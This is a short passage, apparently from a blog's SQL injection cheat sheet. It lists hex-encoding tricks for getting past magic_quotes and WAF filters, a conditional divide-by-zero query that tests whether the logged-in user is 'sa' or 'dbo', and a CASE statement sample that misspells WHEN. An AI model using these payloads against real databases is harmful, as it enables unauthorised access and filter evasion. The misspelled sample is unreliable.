SELECT 0x50 + 0x45 ( this is integer now!) (M) SELECT 0x5045 ( this is not an integer it will be a string from Hex) (M) Very useful for bypassing, magic_quotes() and similar filters, or even WAFs. This will throw an divide by zero error if current logged user is not “sa” or “dbo”. If ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S) If Statement SQL Injection Attack Samples SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END
0 Comments
Leave a Reply. |